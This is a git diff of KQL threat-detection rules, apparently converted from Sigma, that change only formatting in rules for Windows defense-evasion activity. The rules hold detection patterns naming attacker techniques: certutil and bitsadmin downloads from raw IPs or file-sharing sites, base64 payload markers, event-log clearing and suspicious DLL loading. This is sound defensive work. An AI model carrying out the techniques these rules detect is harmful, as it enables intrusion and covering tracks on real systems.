 | where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql b/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql
index b1f14456..2e4cca10 100644
--- a/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql
+++ b/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql
@@ -1,12 +1,12 @@ -// Title: Suspicious Double Extension Files -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022-06-19 -// Level: high -// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.007 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Suspicious Double Extension Files +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2022-06-19 +// Level: high +// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.007 +// False Positives: +// - Unlikely + +DeviceFileEvents | where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".gif." or FolderPath contains ".jpeg." or FolderPath contains ".jpg." or FolderPath contains ".mp3." or FolderPath contains ".mp4." or FolderPath contains ".pdf." or FolderPath contains ".png." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".rtf." or FolderPath contains ".svg." or FolderPath contains ".txt." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".svg" or FolderPath endswith ".zip")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql b/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql index edefc408..285bb01f 100644 --- a/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql 
+++ b/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Download From Direct IP Via Bitsadmin -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 - -DeviceProcessEvents +// Title: Suspicious Download From Direct IP Via Bitsadmin +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql b/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql index 51f3c06c..95235d26 100644 --- a/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql +++ b/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql 
@@ -1,12 +1,12 @@ -// Title: Suspicious Download From File-Sharing Website Via Bitsadmin -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file from a suspicious domain -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -// False Positives: -// - Some legitimate apps use this, but limited. - -DeviceProcessEvents +// Title: Suspicious Download From File-Sharing Website Via Bitsadmin +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file from a suspicious domain +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 +// False Positives: +// - Some legitimate apps use this, but limited. + +DeviceProcessEvents | where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or 
ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql index 3f0b508b..e7361697 100644 --- a/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql 
@@ -1,10 +1,10 @@
-// Title: Suspicious Download Via Certutil.EXE
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-15
-// Level: medium
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: Suspicious Download Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql
index 5cd58835..fa0fd3fd 100644
--- a/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Driver/DLL Installation Via Odbcconf.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-23
-// Level: high
-// Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.008
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Suspicious Driver/DLL Installation Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: high
+// Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "INSTALLDRIVER " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql b/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql
index 782ca154..485a3e51 100644
--- a/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql
@@ -1,10 +1,10 @@ -// Title: Suspicious DumpMinitool Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-06 -// Level: high -// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001 - -DeviceProcessEvents +// Title: Suspicious DumpMinitool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-06 +// Level: high +// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001 + +DeviceProcessEvents | where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql b/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql index e2e660c4..b9fae231 100644 --- a/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql +++ b/KQL/rules/Defense Evasion/suspicious_environment_variable_has_been_registered.kql 
@@ -1,10 +1,10 @@ -// Title: Suspicious Environment Variable Has Been Registered -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-20 -// Level: high -// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence - -DeviceRegistryEvents +// Title: Suspicious Environment Variable Has Been Registered +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-20 +// Level: high +// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence + +DeviceRegistryEvents | where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or 
RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey endswith "\\Environment*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql index 9255b130..bf5ff25f 100644 --- a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql +++ b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql 
@@ -1,15 +1,15 @@
-// Title: Suspicious Eventlog Clearing or Configuration Change Activity
-// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2019-09-26
-// Level: high
-// Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic".
-// This technique were seen used by threat actors and ransomware strains in order to evade defenses.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002
-// False Positives:
-// - Admin activity
-// - Scripts and administrative tools used in the monitored environment
-// - Maintenance activity
-
-DeviceProcessEvents
+// Title: Suspicious Eventlog Clearing or Configuration Change Activity
+// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-09-26
+// Level: high
+// Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic".
+// This technique were seen used by threat actors and ransomware strains in order to evade defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002
+// False Positives:
+// - Admin activity
+// - Scripts and administrative tools used in the monitored environment
+// - Maintenance activity
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") or (ProcessCommandLine contains "Eventing.Reader.EventLogSession" and ProcessCommandLine contains "ClearLog") or (ProcessCommandLine contains "Diagnostics.EventLog" and ProcessCommandLine contains "Clear")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or ((ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql
index 5b5bfe00..410a2762 100644
--- a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql
+++ b/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql
@@ -1,11 +1,11 @@
-// Title: Suspicious Executable File Creation
-// Author: frack113
-// Date: 2022-09-05
-// Level: high
-// Description: Detect creation of suspicious executable file names.
-// Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564
-
-DeviceFileEvents
+// Title: Suspicious Executable File Creation
+// Author: frack113
+// Date: 2022-09-05
+// Level: high
+// Description: Detect creation of suspicious executable file names.
+// Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564
+
+DeviceFileEvents
 | where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql b/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql
index d0d6b0f7..6ea7768f 100644
--- a/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql
+++ b/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Execution of InstallUtil Without Log
-// Author: frack113
-// Date: 2022-01-23
-// Level: medium
-// Description: Uses the .NET InstallUtil.exe application in order to execute image without log
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious Execution of InstallUtil Without Log
+// Author: frack113
+// Date: 2022-01-23
+// Level: medium
+// Description: Uses the .NET InstallUtil.exe application in order to execute image without log
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql b/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql
index 826d9baa..a5da7450 100644
--- a/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Extrac32 Alternate Data Stream Execution
-// Author: frack113
-// Date: 2021-11-26
-// Level: medium
-// Description: Extract data from cab file and hide it in an alternate data stream
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-
-DeviceProcessEvents
+// Title: Suspicious Extrac32 Alternate Data Stream Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Extract data from cab file and hide it in an alternate data stream
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql b/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql
index 920e28f3..45759d1a 100644
--- a/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql
+++ b/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious File Created Via OneNote Application
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-09
-// Level: high
-// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.
-// - Occasional FPs might occur if OneNote is used internally to share different embedded documents
-
-DeviceFileEvents
+// Title: Suspicious File Created Via OneNote Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-09
+// Level: high
+// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.
+// - Occasional FPs might occur if OneNote is used internally to share different embedded documents
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql b/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql
index 086d74c8..9ec0b518 100644
--- a/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql
+++ b/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious File Creation In Uncommon AppData Folder
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-05
-// Level: high
-// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Suspicious File Creation In Uncommon AppData Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
index 5ba94f04..9a163806 100644
--- a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-15
-// Level: high
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
index 9ea93132..40db540a 100644
--- a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-15
-// Level: high
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or 
ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql
index b4f891fd..e3b0c584 100644
--- a/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Encoded To Base64 Via Certutil.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: high
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: Suspicious File Encoded To Base64 Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
